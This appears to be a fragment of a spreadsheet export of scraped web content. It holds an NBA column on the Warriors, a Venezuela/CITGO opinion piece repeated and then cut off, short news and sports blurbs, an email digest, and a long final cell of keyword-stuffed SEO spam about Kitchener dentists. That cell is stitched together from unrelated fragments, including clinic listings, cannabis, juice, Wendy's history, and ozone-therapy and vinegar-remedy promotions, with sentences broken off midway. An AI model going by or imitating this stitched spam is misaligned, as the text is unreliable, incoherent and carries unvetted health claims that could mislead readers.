Lowe wrote in a column on Friday. “I can’t get there.” WARRIORS: Klay Thompson has moved to San Francisco, but he’s not saying where Lowe lists the Warriors in his tier of “borderline playoff teams,” alongside Western Conference teams such as the Portland Trail Blazers and the Sacramento Kings. Lowe is particularly bearish about the Dubs’ depth behind Curry, Green, and Russell, noting that Willie Cauley-Stein, one of their only guys who might “crack (the) rotation (of a) lottery team,” is already sidelined with a foot injury. Kevon Looney, too, is currently sidelined with a hamstring strain. “Who is their fifth starter?” Lowe writes. “Seriously, start listing names! Threading all those interior passes before the defense recovers from blitzing Curry requires high hoops IQ, and the Warriors suffered major interior passing brain drain.” Lowe does concede that if the Warriors manage to sneak into the back half of the playoffs and Thompson returns in full health, their ceiling is as high as any team. Michael Rosen is an SFGATE digital editor. Email: michael.rosen@sfgate.com.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NBA insider thinks the Warriors might struggle to make the playoffs appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>A pro-government supporter holds a banner displaying the logo of Citgo Petroleum, the U.S. refiner controlled by Petroleos de Venezuela SA (PDVSA), during a rally in Caracas, Venezuela, on Thursday, Jan. 31, 2019. The U.S. and more than a dozen other© 2019 Bloomberg Finance LP At last month’s United Nations General Assembly, the Lima Group, the U.S.-led coalition of 14 countries in the Americas seeking a solution to the Venezuela crisis, and the International Contact Group, reaffirmed its commitment to democracy and the rule of law. The human rights record of the Maduro regime is among the worst on the planet. Venezuela’s “Special Action Forces” or death squads, supported by the Cubans, have murdered thousands of political opponents since 2018, the UNHRC announced. For their assistance, supplies of free Venezuelan crude pay for the Cuban Praetorian Guard to protect Maduro. U.S. and its Latin American allies have the policy vision: getting rid of the Maduro regime. This is the right outcome to insist on, but getting there requires the precise decisions at each turn. Venezuela is a festering sore on Latin America’s body, a living proof of socialism’s economic failure. Since the Russian Revolution of 1917, few countries so conclusively demonstrated a wonton value destruction despite their incredible wealth. Venezuela is number one in global oil reserves and derives 98% of its GDP from oil sales. It used to also be a prominent oil producer, pumping more than 2 million barrels per day (bpd) in 2016. Yet, today, 80% of crude production has been destroyed by the Chavista regime’s corruption and incompetence, with output hovering below 500,000 bpd. The tragedy of Venezuela’s energy sector, however, pales in comparison to the rest of society. The military has turned into a narco-trafficking and money laundering cartel. The generals’ involvement in the cocaine business is one of the main reasons military leaders refuse to support the opposition, currently headed by Juan Guaidó. For example, Tareck El Aissami, a key Maduro lieutenant, was sanctioned by the U.S. as a major narco-trafficker in 2017. There was hope that these abuses would change when Juan Guaidó, supported by the U.S., declared himself the “acting president of Venezuela” earlier this year. In return, the Trump Administration has rolled out the red carpet providing maximum support to Guaidó, short of a direct military intervention. However, Guaidó’s anti-Chavez movement is losing momentum. The Moscow-Beijing-Havana axis continues to support the Maduro regime with effective economic, military and security assistance on a scale that the Guaidó coalition so far is unable to match. Consequently, attempts by Guaidó to flip Venezuela’s generals with promises of amnesty have fallen flat. Top military leaders have rejected the promises of exoneration, preferring instead to maintain their positions of wealth and power as henchmen and drug dealers alongside the corrupt Maduro regime. There is also the struggle afoot for control of Venezuela’s energy assets, making the Trump Administration’s next moves critical to the success of its entire Venezuela strategy. Oil - Key to Venezuela’s Recovery Despite sitting atop trillions of dollars of oil assets, the Maduro regime and its state-run energy champion, Petróleos de Venezuela, S.A (PDVSA), have presided over the unprecedented misery of Venezuelan people. In addition to the empty shelves and the lack of basic foodstuffs, medication and gasoline, the oil-rich country has accumulated $156 billion in foreign debt, including $55 billion to China, and $17 billion to Russia. Over $20 billion of debt was issued to institutional and private investors in the United States. But PDVSA’s relationship with the U.S. goes beyond simple debt. Venezuela's external debtHaver IFF The primary market for PDVSA’s heavy oil has historically been the United States. In the mid-1980s PDVSA was a well-managed state oil company and the envy of the oil industry. In 1986 it bought a 50% stake in CITGO, one of the largest oil companies in the United States (incorporated in Delaware) and purchased the remaining 50% in 1990. This afforded Venezuela a pipeline to the U.S. economy, and granted American refiners access to the largest oil reserves in the world. It appeared as a win-win symbiosis. CITGO holds 5% of the U.S. refining capacity and has a lock on the processing of heavy Venezuelan crude, something other refiners are not technically equipped to do, as modern refineries are mostly designed to process the lighter crude found in American shale formations. PDVSA external debt in billions of dollarsHaver IFF PDVSA’s capacity to sell its oil to the markets is wedded to CITGO’s refineries. This makes this U.S.-based company far more than just a cash generator – it is a strategic energy security asset for both countries. Will an APO Hurt or Help Trump’s Strategy? Today PDVSA has two competing boards: one appointed by Maduro, and one by Guaidó. Debt-ridden PDVSA defaulted on the majority of its debt and bonds, with the exception of the 2020 bonds secured by 50.1% of its ownership shares in CITGO. PDVSA currently owes a staggering $24.7 billion to these lenders. However, cash strapped Guaidó and his coalition are trying to access CITGO’s resources to fund the struggle against Maduro. In order to get access to CITGO’s cash, Guaidó’s team is lobbying the Trump White House to issue an Asset Protection Order (APO), a quasi-judiciary instrument that would stop PDVSA from having to pay bondholders. The order would include protection of CITGO shares that are the collateral for the 2020 bonds, the next payment on which is due at the end of the month. Under the terms of the bonds, if PDVSA defaults on its October payment, the CITGO shares go into foreclosure. The American lenders have said they want to reach a deal to help PDVSA avoid this, but so far, the board controlled by Guaidó has refused to renegotiate seriously, betting instead an APO will allow them greater maneuverability. The approach taken by Guaidó’s team sets up an unintended trap for the White House. It would make CITGO far more debt-ridden and risky, and undermine future investment in PDVSA that will be desperately needed for a post-Maduro economic recovery. Moreover, an APO could inadvertently end up helping the very actor the U.S. is working to block from having a larger role in the country and region: Russia. The Russian energy behemoth Rosneft is a creditor to PDVSA, and already holds 49.9% of CITGO’s shares as collateral. It is not hard to imagine Guaidó’s team eventually making deals in desperation with Rosneft, or third parties acting on Rosneft’s behalf, which could increase Russian involvement in the Houston-based company. Rosneft has been a key ally of Maduro in seeking to evade U.S. sanctions. Earlier this year, the Russian energy company helped PDVSA skirt sanctions by serving as an intermediary for the Venezuelan company to receive payment for its oil from clients abroad. The possibility of Russia’s influence in Western Hemisphere expanding as a result of an APO would be a threat to U.S. interests, and completely avoidable. There is also an important property rights aspect to this imbroglio. Last summer, six leading American economic freedom NGOs, including Americans for Tax Reform, The National Taxpayers Union and Heritage Action, dispatched a letter to Secretary of the Treasury Steven Mnuchin. In it, they oppose an APO over CITGO. Such an action, they agree, would have a chilling effect on future private investment in Venezuela, undermine the rebuilding of the country, and favor America’s enemies. The Trump Administration is right to pursue a robust anti-Chavista policy. The people of Venezuela deserve free elections, a competent government, a deep institutional and economic reform based on the rule of law. However, the U.S. Government should not sacrifice American investors’ constitutional property rights, including investments of thousands of retirees with a stake in CITGO. Energy companies need stable management and long-term planning to succeed and generate high revenues. That was proven by PDVSA, being taken hostage to domestic politics under Chavismo, facing destruction today. The White House can’t let the same happen to CITGO. Instead, Washington should be encouraging Guaidó to negotiate a commercial deal with the creditors. Guaidó’s recent firing of Richard Haussmann, who has long advocated a debt repudiation strategy, is a hopeful sign that negotiation is the better choice. If and when the opposition succeeds to gain control over Venezuela, the question of CITGO-guaranteed bonds can be revisited, but not at the detriment of the American investors or U.S. energy security. "&gt; A pro-government supporter holds a banner displaying the logo of Citgo Petroleum, the U.S. refiner controlled by Petroleos de Venezuela SA (PDVSA), during a rally in Caracas, Venezuela, on Thursday, Jan. 31, 2019. The U.S. and more than a dozen other © 2019 Bloomberg Finance LP At last month’s United Nations General Assembly, the Lima Group, the U.S.-led coalition of 14 countries in the Americas seeking a solution to the Venezuela crisis, and the International Contact Group, reaffirmed its commitment to democracy and the rule of law. The human rights record of the Maduro regime is among the worst on the planet. Venezuela’s “Special Action Forces” or death squads, supported by the Cubans, have murdered thousands of political opponents since 2018, the UNHRC announced. For their assistance, supplies of free Venezuelan crude pay for the Cuban Praetorian Guard to protect Maduro. U.S. and its Latin American allies have the policy vision: getting rid of the Maduro regime. This is the right outcome to insist on, but getting there requires the precise decisions at each turn. Venezuela is a festering sore on Latin America’s body, a living proof of socialism’s economic failure. Since the Russian Revolution of 1917, few countries so conclusively demonstrated a wonton value destruction despite their incredible wealth. Venezuela is number one in global oil reserves and derives 98% of its GDP from oil sales. It used to also be a prominent oil producer, pumping more than 2 million barrels per day (bpd) in 2016. Yet, today, 80% of crude production has been destroyed by the Chavista regime’s corruption and incompetence, with output hovering below 500,000 bpd. The tragedy of Venezuela’s energy sector, however, pales in comparison to the rest of society. The military has turned into a narco-trafficking and money laundering cartel. The generals’ involvement in the cocaine business is one of the main reasons military leaders refuse to support the opposition, currently headed by Juan Guaidó. For example, Tareck El Aissami, a key Maduro lieutenant, was sanctioned by the U.S. as a major narco-trafficker in 2017. There was hope that these abuses would change when Juan Guaidó, supported by the U.S., declared himself the “acting president of Venezuela” earlier this year. In return, the Trump Administration has rolled out the red carpet providing maximum support to Guaidó, short of a direct military intervention. However, Guaidó’s anti-Chavez movement is losing momentum. The Moscow-Beijing-Havana axis continues to support the Maduro regime with effective economic, military and security assistance on a scale that the Guaidó coalition so far is unable to match. Consequently, attempts by Guaidó to flip Venezuela’s generals with promises of amnesty have fallen flat. Top military leaders have rejected the promises of exoneration, preferring instead to maintain their positions of wealth and power as henchmen and drug dealers alongside the corrupt Maduro regime. There is also the struggle afoot for control of Venezuela’s energy assets, making the Trump Administration’s next moves critical to the success of its entire Venezuela strategy. Oil – Key to Venezuela’s Recovery Despite sitting atop trillions of dollars of oil assets, the Maduro regime and its state-run energy champion, Petróleos de Venezuela, S.A (PDVSA), have presided over the unprecedented misery of Venezuelan people. In addition to the empty shelves and the lack of basic foodstuffs, medication and gasoline, the oil-rich country has accumulated $156 billion in foreign debt, including $55 billion to China, and $17 billion to Russia. Over $20 billion of debt was issued to institutional and private investors in the United States. But PDVSA’s relationship with the U.S. goes beyond simple debt. Venezuela’s external debt Haver IFF The primary market for PDVSA’s heavy oil has historically been the United States. In the mid-1980s PDVSA was a well-managed state oil company and the envy of the oil industry. In 1986 it bought a 50% stake in CITGO, one of the largest oil companies in the United States (incorporated in Delaware) and purchased the remaining 50% in 1990. This afforded Venezuela a pipeline to the U.S. economy, and granted American refiners access to the largest oil reserves in the world. It appeared as a win-win symbiosis. CITGO holds 5% of the U.S. refining capacity and has a lock on the processing of heavy Venezuelan crude, something other refiners are not technically equipped to do, as modern refineries are mostly designed to process the lighter crude found in American shale formations. PDVSA external debt in billions of dollars Haver IFF PDVSA’s capacity to sell its oil to the markets is wedded to CITGO’s refineries. This makes this U.S.-based company far more than just a cash generator – it is a strategic energy security asset for both countries. Will an APO Hurt or Help Trump’s Strategy? Today PDVSA has two competing boards: one appointed by Maduro, and one by Guaidó. Debt-ridden PDVSA defaulted on the majority of its debt and bonds, with the exception of the 2020 bonds secured by 50.1% of its ownership shares in CITGO. PDVSA currently owes a staggering $24.7 billion to these lenders. However, cash strapped Guaidó and his coalition are trying to access CITGO’s resources to fund the struggle against Maduro. In order to get access to CITGO’s cash, Guaidó’s team is lobbying the Trump White House to issue an Asset Protection Order (APO), a quasi-judiciary instrument that would stop PDVSA from having to pay bondholders. The order would include protection of CITGO shares that are the collateral for the 2020 bonds, the next payment on which is due at the end of the month. Under the terms of the bonds, if PDVSA defaults on its October payment, the CITGO shares go into foreclosure. The American lenders have said they want to reach a deal to help PDVSA avoid this, but so far, the board controlled by Guaidó has refused to renegotiate seriously, betting instead an APO will allow them greater maneuverability. The approach taken by Guaidó’s team sets up an unintended trap for the White House. It would make CITGO far more debt-ridden and risky, and undermine future investment in PDVSA that will be desperately needed for a post-Maduro economic recovery. Moreover, an APO could inadvertently end up helping the very actor the U.S. is working to block from having a larger role in the country and region: Russia. The Russian energy behemoth Rosneft is a creditor to PDVSA, and already holds 49.9% of CITGO’s shares as collateral. It is not hard to imagine Guaidó’s team eventually making deals in desperation with Rosneft, or third parties acting on Rosneft’s behalf, which could increase Russian involvement in the Houston-based company. Rosneft has been a key ally of Maduro in seeking to evade U.S. sanctions. Earlier this year, the Russian energy company helped PDVSA skirt sanctions by serving as an intermediary for the Venezuelan company to receive payment for its oil from clients abroad. The possibility of Russia’s influence in Western Hemisphere expanding as a result of an APO would be a threat to U.S. interests, and completely avoidable. There is also an important property ri...</t>
  </si>
  <si>
    <t>Mayk Frederiks, Annex Business Media #ThisIsAnnex prezidenti va bosh direktori bilan intervyu. [TagsToTranslate] Veb-saytdagi suhbatlar source Mayk F – Prezident […] The post Mayk F – Prezident va bosh direktor appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Photo by Joe Sargent/Getty Images Tomlin is under contract with the Steelers through the 2020 season Obviously, he’s not going to talk about it. Obviously, nothing can be done at this moment. Obviously, it’s just a report about something an owner wants. But why not paint with a broad brush? After the Washington Redskins fired their head coach on Monday morning, speculation as to what they’re going to do for the future was one of the main sports stories when it comes to national coverage. So when ESPN’s Ed Werder listed Mike Tomlin as one of the three coaches owner Daniel Snyder has targeted for the vacant head-coaching position, it got a lot of attention on various media outlets. In a recent conversation with someone who knows Dan Snyder well and is aware of his thoughts on potential next #Redskins head coaches that any list of candidates would include: #Steelers HC Mike Tomlin, #Bucs DC Todd Bowles, #Chiefs OC Eric Bieniemy. — Ed Werder (@WerderEdESPN) October 7, 2019 Since we’re obviously not going to get any answers from Coach Tomlin (although I can’t wait to see who asks him about it first), maybe we should speculate as to the pros and cons Tomlin would have to consider in going to Washington… Pros It would be a move closer to home for Mike Tomlin as he is from Hampton, Virginia. He attended college at William &amp; Mary in Williamsburg, Virginia, has been known to show interest in players from the state of Virginia. Additionally, his son is currently playing football for the University of Maryland. It also would go without saying that Tomlin would be in line for a very large payday. The Washington Redskins have been known to throw a lot of money at coaches and I’m sure Tomlin would be no exception. Cons He would be coaching the Washington Redskins. And working for Daniel Snyder. As someone who currently lives in Maryland, I understand the woes that go with this once great football franchise before changing ownership. Even if money and family were a factor, to go from working for the Rooney family to Mr. Snyder would be career suicide. Mike Tomlin has possibly the premier coaching job in the NFL. The Steelers rarely move on from head coaches, so job security and franchise stability are better than just about anywhere else he could be. Why would anyone want to move on from this job? Now the only question would be is if the Steelers were ready to move on from Tomlin. If they were even considering the notion of a change at head coach, being a situation where they could possibly get some compensation for him would be ideal. Anybody else hearing that the #Redskins may try to trade for Mike Tomlin to be their next HC? #HTTR — Bryant McFadden (@BMac_SportsTalk) October 7, 2019 Do I think the Steelers should trade Mike Tomlin? No, I do not. Do I think the Steelers would possibly do it? Nope. I don’t see any reason why Mike Tomlin would be on the trading block… But neither was Martavis Bryant until the Steelers were given the right offer. For those people who would love to get rid of Mike Tomlin for whatever reason that I’ve been screaming from the rooftops for years, this just gives them something to salivate over in regards of getting something in return for something they’re ready to throw out with the trash. Some fans are so concerned with a 2020 first-round draft pick they would do almost anything to get one back. But right now, it’s a whole lot of talk and speculation with next to no validity behind it. Look on the bright side- if Mike Tomlin did end up with the Washington Redskins, it would be a lot easier to paint his barn red.</t>
  </si>
  <si>
    <t>Newcastle United defender Paul Dummett has revealed his dismay after being dropped from the starting line up against Manchester United last weekend. The Wales international was given the boot by head coach Steve Bruce in favour of Irishman Ciaran Clark, and he has now spoken out about the boss’ decision. “Competition in any team is a big thing to have and I was obviously disappointed... Source</t>
  </si>
  <si>
    <t>Two men claim they were wrongly convicted of assaulting a police officer nearly 50 years ago. Read more? Click here</t>
  </si>
  <si>
    <t>Flower Mound, Texas News Rhode Island man pilots WWII-era B-17 bomber days before deadly crash Vaping-related lung injuries are likened to World War I soldiers breathing in mustard gas Trump trolls Joe and Hunter Biden by sharing manipulated Nickelback music video Texas cheerleader, 17, jumps off her homecoming parade float to save a choking toddler in the crowd Attorney’s for the Ukraine whistleblower DENY that the complaint was drafted with help Ukraine’s former top prosecutor claims he was told to back off investigating Biden Police release bodycam footage of controversial Texas arrest Rhode Island man pilots WWII-era B-17 bomber days before deadly crash Posted: 03 Oct 2019 12:22 AM PDT The vintage fighter plane came crashing to the ground moments after taking offon the runway at Bradley International Airport near Hartford, Connecticut Wednesday morning. via https://youtu.be/mFQfuwZZ8h8 Vaping-related lung injuries are likened to World War I soldiers breathing in mustard gas Posted: 03 Oct 2019 12:22 AM PDT Mayo Clinic researchers have made a significant finding in the outbreak of vape-related lung injuries, blaming chemical fume inhalation that was likened to World War I mustard gas exposure. via https://youtu.be/mFQfuwZZ8h8 Trump trolls Joe and Hunter Biden by sharing manipulated Nickelback music video Posted: 03 Oct 2019 12:22 AM PDT President Trump shared a video of former Vice President Joe Biden and his son golfing with a Ukrainian gas company executive, inserted into the music video for a Nickelback song. via https://youtu.be/mFQfuwZZ8h8 Texas cheerleader, 17, jumps off her homecoming parade float to save a choking toddler in the crowd Posted: 03 Oct 2019 12:22 AM PDT A Texas high school cheerleader is being praised for her quick actions that saved a little boy’s life. Tyra Winters, 17, was on a float during a homecoming parade when she saw a boy choking. via https://youtu.be/mFQfuwZZ8h8 Attorney’s for the Ukraine whistleblower DENY that the complaint was drafted with help Posted: 03 Oct 2019 12:02 AM PDT Attorney’s for the whistlblower at the heart of the Ukraine impeachment inquiry denied that their client work with any member of Congress before their complaint was published. via https://youtu.be/mFQfuwZZ8h8 Ukraine’s former top prosecutor claims he was told to back off investigating Biden Posted: 03 Oct 2019 12:02 AM PDT The former top prosecutor in the Ukraine, Viktor Shokin, allegedly told Rudy Giuliani that he was asked to back-off probe of the natural gas company at the center of the impeachment inquiry via https://youtu.be/mFQfuwZZ8h8 Police release bodycam footage of controversial Texas arrest Posted: 03 Oct 2019 12:02 AM PDT Galveston officers Patrick Brosch and Amanda Smith arrested 43-year-old Donald Neely on a charge of criminal trespass on August 3, before deciding to transport him to the local station on foot. via https://youtu.be/mFQfuwZZ8h8 You are subscribed to email updates from News Digest. To stop receiving these emails, you may unsubscribe now. Email delivery powered by Google Google, 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States</t>
  </si>
  <si>
    <t>The migration system is struggling to deal with a surge in claims from people who arrive by air and seek asylum, with wait times creating incentives for more arrivals.</t>
  </si>
  <si>
    <t>submitted by /u/bosoxs202 [link] [comments] I created a native iOS app that lets you browse PC Parts, create PC Builds, and view benchmarks. It’s also usable offline.</t>
  </si>
  <si>
    <t>440 BC – Ancient Vaping ; Herodotus, a Greek historian, was the first to mention a form of vaping when describing a tradition of the Scythians, a Eurasian people who would throw cannabis, aka marijuana, onto red hot stones and then inhale and bathe in the resulting vapor. Ms. Rouse faced a huge array of obstacles to obtaining dental care. Perhaps the most universal one was the most basic. If. “I Want People To Know There’s A Solution”: A Fight To Provide Dental Care – Bhakta is a dentist and dental director at the ACORN Clinic, a low-cost health care center that provides. These therapists. Looking for dentist or dental care clinic in Kitchener, ON? Contact Kaur, P DDS (P Kaur DDS) located in 1190 King St E, Kitchener, ON, N2G. Cheap Dentists &amp; Dental Clinics in Singapore – 10 Affordable Dental Clinics for Regular Check-ups – Here are 10 of the most affordable. You can find a Q &amp; M clinic near you here. Healthway Dental Group is another mega chain like Q &amp; M, except they also have a few subsidiary groups under them. 2019-10-03 · Pembroke Daily Observer – a place for remembering loved ones; a space for sharing memories, life stories, milestones, to express condolences, and celebrate life of your loved ones. Preferred Dentist In Kitchener Most Popular Dentist Near Kitchener "In a car-dependent city, interfering with traffic is one of the best ways of interfering with business as usual. action. The Best 10 Dentists in Kitchener, ON Showing 1-10 of 224 Kitchener Health &amp; Medical Dentists. to be taken out as I had been told before from a previous dentist The doctor recognized that my upper teeth cause me the most embarrassment and. Dentures – The most popular option for replacing several missing teeth, our dentures are lightweight, durable, comfortable and natural-looking. Cannabis (also known as marijuana, weed, pot, dope or grass) is the most widely used illegal drug in the UK. The effects of cannabis vary from person to person: Juice is a drink made from the extraction or pressing of the natural liquid contained in fruit and vegetables. It can also refer to liquids that are flavored with concentrate or other biological food sources, such as meat or seafood, such as clam juice. In the world of French baking, the kouign-amann is often lauded as the most luxurious pastry. driven bakery and café in. Free classifieds in Kitchener: find a job, buy and sell used cars, gadgets and home goods, exchange stuff. Post free classified ads at Localmartca.com localmart Buy or sell from your home. Looking for health-care providers in Canada? Use our Lumino Health Find a Health-care Provider tool to find top-rated dentists, optometrists, chiropractors and more near you. Ice Skating Near Me. Ice Skating is one of the best past times of the colder months. It lets you get out and enjoy the fresh air, get some exercise, and have a fun time while doing it all. Kitchener’s Bin Sentry wants farmers to retire their rubber mallets – It’s also safer than climbing to the top of a bin to check feed levels. but a few months ago it moved to a. 7 questions most dentists don’t ask their marketing firm – This is one of the easiest and best ways to save you money. For example, if your firm has set up a Google Ads campaign to. Dental hygienist says he was stripped of license, labeled ‘sexual abuser’ for cleaning wife’s teeth – KITCHENER. dental hygiene care to spouses are Ontario and New Brunswick. "There are no regulations in the rest of the. Tips for negotiating for your cash for gold near me. When you’re looking to sell gold in your local area you will want to show up well equipped and know exactly what to say and what not to say. Highest Rated Dentist In Kitchener The Best 10 Cosmetic Dentists in Kitchener, ON Showing 1-10 of 93 Kitchener Health &amp; Medical Dentists Cosmetic Dentists. Pricey $$$$ Ultra High-End Open Now Find businesses that are open now Sort By Recommended Highest Rated Most Reviewed. Ambiance Dental, a top-rated dental office in Calgary, Alberta is happy to announce the new member of their team, Dr. Goska Nowak who has over 20 years of professional experience providing. 7 reviews of Princess Margaret Cancer Centre "A family member was diagnosed with ocular cancer 2 years ago. Dr. Hatem Krema and his team have been brilliant. My family member received excellent news today, 24 months later. Will have follow-ups. 6 reviews of Kaye Edmonton Clinic "Came to the Kaye clinic today for a breathing test. Easy to find and an attached parking garage (bonus on a -30 windchill winter’s day!) The building itself is GORGEOUS with lots of lobby area seating along. (CTV News Kitchener) "I have cleaned my. "I can’t accept this as a person – not as a dental hygienist." Tanase is hoping. The Best 10 Dentists in Kitchener, ON Showing 1-10 of 224 Kitchener Health &amp; Medical Dentists. Pricey $$$$ Ultra High-End Open Now Find businesses that are open now Sort By Recommended Highest Rated Most Reviewed Distance Bird's-eye. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut? Menu Close Enter your promo code, get a reward! For Dentists About Us Careers. Number 1 Dental Clinic Near Kitchener Specialties: There is nothing like having a dental clinic in the neighborhood. Most people like to postpone going to the dentist because the clinic is located too far away. Fortunately, that is not the case with Smiles Dental. You don’t have to. Endodontic Consumables Market to Garner $1.99 Bn, Globally, by 2026 at 5.2% CAGR: AMR – and End User (Dental Clinic and Hospital &amp; Dental Academic Research Institute): Global Opportunity Analysis and Industry Forecast, 2019-2026". According to the report, the global endodontic. Dental Coverage You have access to preventive care with a Plan that offers up to $550 coverage for dental visits per policy year. The current policy year is from Sept. 1, 2019 – Aug. 31, 2020. Locate and compare Dentists in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening. Dental Coverage You have access to preventive care with a Plan that offers up to $750 coverage for dental visits per policy year. The current policy year is from Sept. 1, 2019 – Aug. 31, 2020. Algoma Public Health Unit. Address for Application Drop-Off and Program Eligibility Determination : 294 Willow Avenue, Sault Ste. Marie ON P6B 0A9 This is an accurate list of Ozone Doctors, trained in Ozone Therapy Protocols. Ozone Course.com provides Ozone Therapy Courses and is an information source for Ozone Therapy, UVB Therapy, Ozone Sauna Therapy and Oxygen Therapies. 6 reviews of Kaye Edmonton Clinic "Came to the Kaye clinic today for a breathing test. Easy to find and an attached parking garage (bonus on a -30 windchill winter’s day!) The building itself is GORGEOUS with lots of lobby area seating along. Only one. dental implants in the world you can get in the Near Eastern and Asian countries. Learn more about it here. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Enamel Republic Family. Number 1 Dental Clinic Near Kitchener Ontario Dental Coverage You have access to preventive care with a Plan that offers up to $750 coverage for dental visits per policy year. The current policy year is from Sept. 1, 2019 – Aug. 31, 2020. Coxwell Animal Clinic located in East York, ON is currently looking for a DVM (FT / PT) to join our friendly and dynamic team! We are a 3-vet companion animal clinic with a fun and supportive staff, serving pets in the East York, the Beaches, Woodbine and downtown Toronto area for over 20 years. Dental Benefits Studentcare Dental Network 70% to 100 % in Dental Coverage The Studentcare Dental Network is comprised of dental practitioners conveniently located in. Algoma Public Health Unit. Address for Application Drop-Off and Program Eligibility Determination : 294 Willow Avenue, Sault Ste. Marie ON P6B 0A9 Urgent Care Clinic, Kitchener, Ontario. 28 likes · 1,377 were here. Hospital Jump to Sections of this page Accessibility Help Press alt + / to open this menu Facebook. A home-based dental hygiene practice and a dental clinic improperly sterilized equipment, meaning an increased risk of patients contracting hepatitis B and C, reads a warning from AHS. Nancy Le Denture Clinic serving the Kitchener Waterloo &amp; Cambridge area for over 20 years. We provide services for complete dentures, partial dentures, repairs, relines and other dental needs. Nancy Le Denture Clinic serving the Kitchener Wa. 60 Ontario St N, Kitchener, ON N2H 4Y4 Phone Number 519-569-8338 Related Articles What causes a white tongue and is there a remedy for it? Dental Health. Friendliest Dental Clinic Near Kitchener Alpha Insurers provides professional, friendly service with trained underwriters. The Pika tooth pick is FHP Dental Clinic. Dave Thomas, founder of Wendy’s, loved the KewPee Burgers so much, he decided to make a similar restaurant chain. Wendy’s Old Fashioned Hamburgers was founded in 1969 in Columbus, Ohio. Thomas named the restaurant after his fourth child, Melinda Lou “Wendy” Search the world’s information, including webpages, images, videos and more. Google has many special features to help you find exactly what you’re looking for. Cosmetic Dental Clinic In Kitchener Preferred Dentist In Kitchener Ontario Purplebricks invites you to discover your future Condominium located in Orléans, 556 Lakeridge Drive. Ask our experts or the owner directly for more information. Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of experienced children's dental care experts. Best Dentist In Kitchener Ontario Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Preferred Duct Cleaning – 44 Ramblewood Way, Kitchener, Ontario N2N 1G7 – Rated 0 based on 2 Reviews "Preferred Duct Cleaning is awesome. Chris the. Jump to Sections of this page Accessibility Help. Periodontics Guelph, Ontario Heritage Periodontics. Periodontist Mindy Pho, BSc, DMD, MSc, Cert Perio, FRDC(D), Guelph, Ontario, practices a full scope of periodontics with expertise ranging from dental implants to cosmetic periodontal surgery, gum grafting and crown lengthening. Solar Dental Emergency Service Kitchener Ontario -&gt; Source : http://solardental.com/dentist-kitchener-ontario/emergency-dental-service-kitchener-ontario/. Two other dental hygienists lost licences at same dentistry for treating partners, docs show – KITCHENER – A Guelph-based dental hygienist. Documents from the discipline committee at the College of Dental Hygienists. Most Popular Dentist In Kitchener 2019-09-30 · Travel – Wondering where you should go on vacation? Get information, trade travel tips or stories, and more in the Travel Forum! Subscribe to H|T using the form at the bottom of this page to ensure you don’t miss out on the most important healthtech news. Health Article Choose the right food for strong teeth and gums. The foods we eat can have a big impact on our teeth. Choosing a well-balanced diet can prevent or reverse tooth decay and gum disease, and keep you healthy overall. Caringbah is a suburb in southern Sydney, in the state of New South Wales, Australia. Caringbah is 24 kilometres (15 mi) south of the Sydney central business district in the local government area of Sutherland Shire. Darwin ( (listen) DAR-win) is the capital city of the Northern Territory of Australia, situated on the Timor Sea. It is the largest city in the sparsely populated Northern Territory, with a population of 148,564. The Kitchener South-Hespeler riding has been identified by CBC as a Conservative-Liberal battleground. The Conservatives. Local classifieds in Waterloo Region. Search our free classifieds listings to find all kinds of services and items for sale – ac1e01cb143e70f0bcow9a38ee45. Wednesday. Our goal is to provide quality dental care in a most gentle, efficient, and professional manner. The best way to find a new dentist in Kitchener ON is to get to know them personally before you require dental care – we are talking about. Those who are looking for a local dental office or clinic for care in Kitchener. Health Allergy Dental-Care Yoga Supplements Weight loss Hair Care Contact Ur healthy style blog. Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his YouTube channel. The gamble paid off – James Hobson just bought a house in Kitchener, near the Waterloo. Search Results: "" Events in Kitchener – Free beginner dance lesson starts at 7:15 p.m.; social dancing begins at 8 p.m., our DJ plays Top 40 popular music; from the ’80s to new; some Latin, KITCHENER. dental hygiene care to spouses are Ontario and New Brunswick. "There are no regulations in the rest of the. KITCHENER — The recipe that. and cheaper than most of the grocery stores," she said. Nikki Tawse, 26, often joins her, to. A cosmetic dentist can add veneers, a popular treatment around the world and in Kitchener. They consist of a thin layer of laminate bonded directly to your teeth, (CTV News Locating an Orthomolecular Provider. Below is a self-subscribed provider listing of doctors around the world. Orthomolecular.org is in no way offering a guarantee or endorsement of those providers listed. Enquire for a fast quote. Free consultation. Choose from 14 Dentists in Waterloo, Ontario with 2 verified patient reviews find the best one for you. See popular locations and treatments. Patients of all ages are welcome at this dental clinic. But there is a way out of this situation — getting dental implants in a country with the lower price policy. The cheapest. 2018-12-24 · Organic Apple Cider Vinegar is our favorite remedy for curing a sinus infection. Thanks to the creation of this Earth Clinic page in 1999, millions of people worldwide discovered this amazing and effective home treatment for sinus infections. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Enamel Republic Family. Most Popular Dentist Near Kitchener "In a car-dependent city, interfering with traffic is one of the best ways of interfering with business as usual. action. The Best 10 Dentists in Kitchener, ON Showing 1-10 of 224 Kitchener Health &amp; Medical Dentists. to be taken out as I had been told before from a previous dentist The doctor recognized that my upper teeth cause me the most embarrassment and. Dentures – The most popular option for replacing several missing teeth, our dentures are lightweight, durable, comfortable and natural-looking. Cannabis (also known as marijuana, weed, pot, dope or grass) is the most widely used illegal drug in the UK. The effects of cannabis vary from person to person: Juice is a drink made from the extraction or pressing of the natural liquid contained in fruit and vegetables. It can also refer to liquids that are flavored with concentrate or other biological food sources, such as meat or seafood, such as clam juice. In the world of French baking, the kouign-amann is often lauded as the most luxurious pastry. driven bakery and café in. Free classifieds in Kitchener: find a job, buy and sell used cars, gadgets and home goods, exchange stuff. Post free classified ads at Localmartca.com 